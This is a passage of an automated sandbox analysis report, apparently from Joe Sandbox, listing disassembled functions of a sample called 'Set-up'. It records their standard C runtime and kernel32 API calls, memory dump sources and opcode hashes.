                                                                                              • String ID: `template-parameter$void
                                                                                              • API String ID: 1388095176-4057429177
                                                                                              • Opcode ID: e69ddaa88f9d72b28e41cded5a9b935876d41965e916dc5818e1dd7ded31bab4
                                                                                              • Instruction ID: c897e460792f364dfc40ba0ea852d04027e1ecae27351d37eb0b0ca940161a51
                                                                                              • Opcode Fuzzy Hash: e69ddaa88f9d72b28e41cded5a9b935876d41965e916dc5818e1dd7ded31bab4
                                                                                              • Instruction Fuzzy Hash: 0E514771E442889FCF10DFA8E8909EEBBF8FB19344F60406AE515E7240EB399E45CB10
                                                                                              Function 6BBA5672 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 77COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BBA5679
                                                                                              • malloc.MSVCR100(?,00000014,6BBA5DD5,?,00000001,00000001), ref: 6BBA56C3
                                                                                                • Part of subcall function 6BB60233: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7), ref: 6BB60263
                                                                                              • std::exception::exception.LIBCMT(?,00000001,00000014,6BBA5DD5,?,00000001,00000001), ref: 6BBA56EC
                                                                                              • _CxxThrowException.MSVCR100(?,6BB6BDD8,?,00000001,00000014,6BBA5DD5,?,00000001,00000001), ref: 6BBA5701
                                                                                              • ?wait_for_multiple@event@Concurrency@@SAIPAPAV12@I_NI@Z.MSVCR100(00000000,00000002,00000001,000000FF,00000014,6BBA5DD5,?,00000001,00000001), ref: 6BBA5736
                                                                                              • _freea_s.MSVCR100(00000000,00000000,00000002,00000001,000000FF,00000014,6BBA5DD5,?,00000001,00000001), ref: 6BBA573C
                                                                                              • ?wait@event@Concurrency@@QAEII@Z.MSVCR100(000000FF,00000014,6BBA5DD5,?,00000001,00000001), ref: 6BBA574B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$?wait@event@?wait_for_multiple@event@AllocateExceptionH_prolog3_HeapThrowV12@_freea_smallocstd::exception::exception
                                                                                              • String ID: bad allocation
                                                                                              • API String ID: 2067162669-2104205924
                                                                                              • Opcode ID: 945190f58df9628e08d066e6147688700127e8be6291d47772984438fe253cdc
                                                                                              • Instruction ID: 79c6b021737876004210a56dcaf2a6f948602368e53207160c8d9482767c27d9
                                                                                              • Opcode Fuzzy Hash: 945190f58df9628e08d066e6147688700127e8be6291d47772984438fe253cdc
                                                                                              • Instruction Fuzzy Hash: 0D21E0B2D046969FDB14CF68CC82E9D73B5EF45760F510264E964AB280EB3CEE41CB64
                                                                                              Function 6BB769D5 Relevance: 13.7, APIs: 9, Instructions: 226COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT(?,000000FF,00000024,?,?,6BB769D0,?), ref: 6BB769F5
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB76A30
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB76AED
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB76B46
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB76B63
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB76B86
                                                                                              • _errno.MSVCR100(?,?,6BB769D0,?), ref: 6BB89D32
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,6BB769D0,?), ref: 6BB89D3C
                                                                                              • _errno.MSVCR100(?,?,?,?,6BB769D0,?), ref: 6BB89D56
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$_errno$_invalid_parameter_noinfo_memset
                                                                                              • String ID:
                                                                                              • API String ID: 1299486453-0
                                                                                              • Opcode ID: e3baffa2ddadfa9d967ca9fabea6f8f3804a15962311de9151bfec8c21b309fe
                                                                                              • Instruction ID: aded8c9474d202b2ad29586e8f3a378098250f375417ddc929c127d82751ef05
                                                                                              • Opcode Fuzzy Hash: e3baffa2ddadfa9d967ca9fabea6f8f3804a15962311de9151bfec8c21b309fe
                                                                                              • Instruction Fuzzy Hash: 02613571A00645AFDB24AF78CC41BAE77B6EB85328F10817DF522DB2D1E779E9008B44
                                                                                              Function 6BB6AD86 Relevance: 13.7, APIs: 9, Instructions: 200COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStartupInfoW.KERNEL32(?), ref: 6BB6AD93
                                                                                              • _calloc_crt.MSVCR100(00000020,00000040), ref: 6BB6AD9F
                                                                                              • GetStdHandle.KERNEL32(-000000F6), ref: 6BB6AE36
                                                                                              • GetFileType.KERNEL32(00000000), ref: 6BB6AE50
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(-6BC03734,00000FA0), ref: 6BB6AE80
                                                                                              • SetHandleCount.KERNEL32 ref: 6BB6AEA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountHandle$CriticalFileInfoInitializeSectionSpinStartupType_calloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 1159209115-0
                                                                                              • Opcode ID: 7e5e5502ae922cad349e466ed40e7a249658455d8d88d7f9a4718591cab03983
                                                                                              • Instruction ID: baf5aed3cc59be63247c344e243300141cf3de74dcd5122e199172c75d173767
                                                                                              • Opcode Fuzzy Hash: 7e5e5502ae922cad349e466ed40e7a249658455d8d88d7f9a4718591cab03983
                                                                                              • Instruction Fuzzy Hash: C7713572904B918FDB208F28C888B1977F4EF4A760F2947A9D576CB2E1E739D941CB41
                                                                                              Function 6BB642DE Relevance: 13.7, APIs: 9, Instructions: 169COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _fileno
                                                                                              • String ID:
                                                                                              • API String ID: 467780811-0
                                                                                              • Opcode ID: 9b231a6de945202ccafceaf37972a969a298d2328f53e03365b381c6f1b9ce8a
                                                                                              • Instruction ID: 2d6a5cce87c115d63fa3eb31359a1b6adffbc895d0599f49be968dd4383abd5a
                                                                                              • Opcode Fuzzy Hash: 9b231a6de945202ccafceaf37972a969a298d2328f53e03365b381c6f1b9ce8a
                                                                                              • Instruction Fuzzy Hash: 3851E132504B82DFCB259F28C845A9A73F0EF4A368B144969D5B59B291E33CEA45CB40
                                                                                              Function 6BB72E42 Relevance: 13.7, APIs: 9, Instructions: 165COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memcpy_s.MSVCR100(?,?,?,?), ref: 6BB72EEB
                                                                                              • _errno.MSVCR100 ref: 6BB88C29
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB88C34
                                                                                              • _memset.LIBCMT(?,00000000,?), ref: 6BB88C47
                                                                                              • _fileno.MSVCR100(?,?,?), ref: 6BB88CA3
                                                                                              • _read.MSVCR100(00000000,?,?), ref: 6BB88CAA
                                                                                              • _memset.LIBCMT(?,00000000,000000FF), ref: 6BB88CD4
                                                                                              • _errno.MSVCR100 ref: 6BB88CDC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_memset$_fileno_invalid_parameter_noinfo_readmemcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 4008029522-0
                                                                                              • Opcode ID: a068426ed4a9256c8f7709657f9dc5e33b02665cc90f0d207b602e5e90d0fa0d
                                                                                              • Instruction ID: 47a09931707bc8010b5b6fdcbb5e95d577fa9a0f81035319f5178f51fa11e0f9
                                                                                              • Opcode Fuzzy Hash: a068426ed4a9256c8f7709657f9dc5e33b02665cc90f0d207b602e5e90d0fa0d
                                                                                              • Instruction Fuzzy Hash: B6510471A01689EBCB309FB9CD8069EB7B1EF42360F1086B9E835962C4D7789A51CF51
                                                                                              Function 6BB703E4 Relevance: 13.6, APIs: 9, Instructions: 132COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _fileno.MSVCR100(6BB71022,?,?,?,6BB71022,00000040,?), ref: 6BB703EF
                                                                                              • _write.MSVCR100(6BB71022,FFFF94F1,00000000,00000000,6BC035D0,?,?,?,6BB71022,00000040,?), ref: 6BB7045D
                                                                                              • __p__iob.MSVCR100(6BC035D0,?,?,?,6BB71022,00000040,?), ref: 6BB72ACF
                                                                                              • __p__iob.MSVCR100(6BC035D0,?,?,?,6BB71022,00000040,?), ref: 6BB72ADF
                                                                                              • _errno.MSVCR100(?,?,?,6BB71022,00000040,?), ref: 6BB888CD
                                                                                              • _errno.MSVCR100(?,?,?,6BB71022,00000040,?), ref: 6BB888E4
                                                                                              • _isatty.MSVCR100(6BB71022,6BC035D0,?,?,?,6BB71022,00000040,?), ref: 6BB8890B
                                                                                              • __lseeki64.LIBCMT(6BB71022,00000000,00000000,00000002,00000000,6BC035D0,?,?,?,6BB71022,00000040,?), ref: 6BB88928
                                                                                              • _write.MSVCR100(6BB71022,00000040,00000001,00000000,6BC035D0,?,?,?,6BB71022,00000040,?), ref: 6BB88948
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __p__iob_errno_write$__lseeki64_fileno_isatty
                                                                                              • String ID:
                                                                                              • API String ID: 2198290031-0
                                                                                              • Opcode ID: 844f373269ff8debc2d0053b621d158c540e53a49e1ce14d5808154362f16935
                                                                                              • Instruction ID: 0ffebab46c5051af86efb9b47fd9fbec57792789ee15fdd42265eb8932f8f810
                                                                                              • Opcode Fuzzy Hash: 844f373269ff8debc2d0053b621d158c540e53a49e1ce14d5808154362f16935
                                                                                              • Instruction Fuzzy Hash: DE41DF728047819FD7309F38CC81A5A77A0EF46364B60C66EE4B99B2D0E73CE900CB51
                                                                                              Function 6BB739A1 Relevance: 13.6, APIs: 9, Instructions: 132COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _fileno.MSVCR100(?,?,?,?,6BB73AA1,?,?), ref: 6BB739AC
                                                                                              • __p__iob.MSVCR100(6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB739EE
                                                                                              • __p__iob.MSVCR100(6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB739FE
                                                                                              • _errno.MSVCR100(?,?,?,6BB73AA1,?,?), ref: 6BB88964
                                                                                              • _errno.MSVCR100(?,?,?,6BB73AA1,?,?), ref: 6BB8897D
                                                                                              • _isatty.MSVCR100(?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB889A5
                                                                                              • _write.MSVCR100(?,?,?,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB889B4
                                                                                              • __lseeki64.LIBCMT(?,00000000,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB889D2
                                                                                                • Part of subcall function 6BB6CF2C: _malloc_crt.MSVCR100(00001000,?,6BB73A14,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB6CF36
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __p__iob_errno$__lseeki64_fileno_isatty_malloc_crt_write
                                                                                              • String ID:
                                                                                              • API String ID: 2248077258-0
                                                                                              • Opcode ID: daf2732758cc83c5255265f7ff3e06489dfb419d811ee798678a2f33d9577e79
                                                                                              • Instruction ID: 44ee0c58a3c77e9ec2e5c41fa0966a4a10638bb911257457eae19b70b7eec3b0
                                                                                              • Opcode Fuzzy Hash: daf2732758cc83c5255265f7ff3e06489dfb419d811ee798678a2f33d9577e79
                                                                                              • Instruction Fuzzy Hash: 4941AE72900781AFDB309F68CC42B5977A0EF45364F10966DE4B69B690E73CE901CB52
                                                                                              Function 6BBA1519 Relevance: 13.6, APIs: 9, Instructions: 122COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?,6BBA13AB), ref: 6BBA152F
                                                                                              • CloseHandle.KERNEL32(?,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?,6BBA13AB), ref: 6BBA153B
                                                                                              • ??3@YAXPAX@Z.MSVCR100(00000000,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?,6BBA13AB), ref: 6BBA156C
                                                                                              • InterlockedFlushSList.KERNEL32(?,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?,6BBA13AB), ref: 6BBA1585
                                                                                              • InterlockedFlushSList.KERNEL32(?,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?,6BBA13AB), ref: 6BBA15B4
                                                                                                • Part of subcall function 6BBA1664: ??3@YAXPAX@Z.MSVCR100(?,?,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002), ref: 6BBA1680
                                                                                                • Part of subcall function 6BBA1664: _memset.LIBCMT(?,00000000,00000000,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152), ref: 6BBA16A1
                                                                                                • Part of subcall function 6BBA1664: ??3@YAXPAX@Z.MSVCR100(?,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?), ref: 6BBA16AC
                                                                                                • Part of subcall function 6BBA1664: ??3@YAXPAX@Z.MSVCR100(?,?,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002), ref: 6BBA16B2
                                                                                              • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100(?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?,6BBA13AB), ref: 6BBA1600
                                                                                              • SetEvent.KERNEL32(?,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?), ref: 6BBA163C
                                                                                              • CloseHandle.KERNEL32(?,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?), ref: 6BBA1645
                                                                                              • ??3@YAXPAX@Z.MSVCR100(00000000,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?,?), ref: 6BBA164C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@$CloseFlushHandleInterlockedList$AcquireConcurrency@@EventLock@details@ReaderWrite@_Writer_memset
                                                                                              • String ID:
                                                                                              • API String ID: 2332770512-0
                                                                                              • Opcode ID: 30ded1bac8dd10b14a3ced18344df2429cc740bddb6e88c1af16c554b44c88f9
                                                                                              • Instruction ID: 9d993ba7496f38fc070b36fc1204c4db40a3e92e62f09e6eb431beb8849a219a
                                                                                              • Opcode Fuzzy Hash: 30ded1bac8dd10b14a3ced18344df2429cc740bddb6e88c1af16c554b44c88f9
                                                                                              • Instruction Fuzzy Hash: 7041D831A056719FDB498F78C985B98B7A0FF06B14F0C025CE916C7290DB75E811CBD0
                                                                                              Function 6BB9D988 Relevance: 13.6, APIs: 9, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?,6BB9DB65,?,?,?,?,?,6BB9D133,?,00000000), ref: 6BB9D99D
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?,?,6BB9DB65,?,?,?,?,?,6BB9D133,?,00000000), ref: 6BB9D9A5
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?,?,?,6BB9DB65,?,?,?,?,?,6BB9D133,?,00000000), ref: 6BB9D9AD
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?,?,6BB9DB65,?,?,?,?,?,6BB9D133,?,00000000), ref: 6BB9D9C4
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6BB9D9E7
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000), ref: 6BB9DA01
                                                                                              • _memset.LIBCMT(?,00000000,?,6BB9DB65,?,?,?,?,?,6BB9D133,?,00000000), ref: 6BB9DA17
                                                                                              • _memset.LIBCMT(?,00000000,?,00000000), ref: 6BB9DA30
                                                                                              • _memset.LIBCMT(?,00000000,?,?,00000000,?,00000000), ref: 6BB9DA41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID:
                                                                                              • API String ID: 2102423945-0
                                                                                              • Opcode ID: 399dc4ed66b7cbe5b5e6b7a1d4377a48d4a9f37d9226bb78bfb4cd55a10beb20
                                                                                              • Instruction ID: 90101270d3c0dbd760cb7b57e960a8d4de4273812edfd539f026405a497a5364
                                                                                              • Opcode Fuzzy Hash: 399dc4ed66b7cbe5b5e6b7a1d4377a48d4a9f37d9226bb78bfb4cd55a10beb20
                                                                                              • Instruction Fuzzy Hash: 72210B71641B815FE7389B39D943B2BB7E4EB05354F508D2DE2978A9A0EB79F8108A00
                                                                                              Function 6BB6C038 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __doserrno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB6C0FC
                                                                                              • __doserrno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD25
                                                                                              • _errno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD2D
                                                                                              • _errno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD43
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD4E
                                                                                              • __doserrno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD55
                                                                                              • _errno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD5D
                                                                                              • _errno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD6A
                                                                                              • __doserrno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD75
                                                                                                • Part of subcall function 6BB6A5A9: EnterCriticalSection.KERNEL32(00000108,6BB6A610,0000000C,6BB7038E,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?), ref: 6BB6A5FA
                                                                                                • Part of subcall function 6BB6BF22: ReadFile.KERNEL32(?,00000040,?,?,00000000,?,?,?), ref: 6BB6BFE8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __doserrno_errno$CriticalEnterFileReadSection_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 590220429-0
                                                                                              • Opcode ID: a63e595d393b8d6369625aca4819fa00540afef82b281a525c5825f98ceccafc
                                                                                              • Instruction ID: 0c6c9fdb73f8f4e83fc5d9e981ad53bcc77b5c8b1b3037c488cfd7a94fd81598
                                                                                              • Opcode Fuzzy Hash: a63e595d393b8d6369625aca4819fa00540afef82b281a525c5825f98ceccafc
                                                                                              • Instruction Fuzzy Hash: 4A216F718543C59FDB219FB8C982B5D3760AF02369F510685D6349B1E0FBBD8D408F61
                                                                                              Function 6BB9FAE0 Relevance: 13.6, APIs: 9, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InterlockedFlushSList.KERNEL32(?,?,?,6BB9F44A), ref: 6BB9FAEB
                                                                                              • ??3@YAXPAX@Z.MSVCR100(-00000004,?,?,6BB9F44A), ref: 6BB9FAF7
                                                                                              • InterlockedFlushSList.KERNEL32(?,?,?,6BB9F44A), ref: 6BB9FB05
                                                                                              • ??3@YAXPAX@Z.MSVCR100(-00000004,?,?,6BB9F44A), ref: 6BB9FB11
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,?,?,6BB9F44A), ref: 6BB9FB26
                                                                                              • ??3@YAXPAX@Z.MSVCR100(00000000,?,?,6BB9F44A), ref: 6BB9FB43
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?,?,?,6BB9F44A), ref: 6BB9FB54
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,?,?,?,6BB9F44A), ref: 6BB9FB5A
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?,?,?,6BB9F44A), ref: 6BB9FB6A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@$FlushInterlockedList
                                                                                              • String ID:
                                                                                              • API String ID: 681866488-0
                                                                                              • Opcode ID: 0637412df3d860510296e7cc4e4fbe67ebf55772b208155ddafe0204830fa88c
                                                                                              • Instruction ID: e92ca9900ddb18a54f7d9fa7793f0c867fd915f2268fe2a4eb1ac919515f186e
                                                                                              • Opcode Fuzzy Hash: 0637412df3d860510296e7cc4e4fbe67ebf55772b208155ddafe0204830fa88c
                                                                                              • Instruction Fuzzy Hash: AB117C76404A82DB8302EE76E4D180EB3BAFF9A370375056EF61587610FB38F952CA50
                                                                                              Function 6BB6A9DB Relevance: 13.6, APIs: 9, Instructions: 61COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
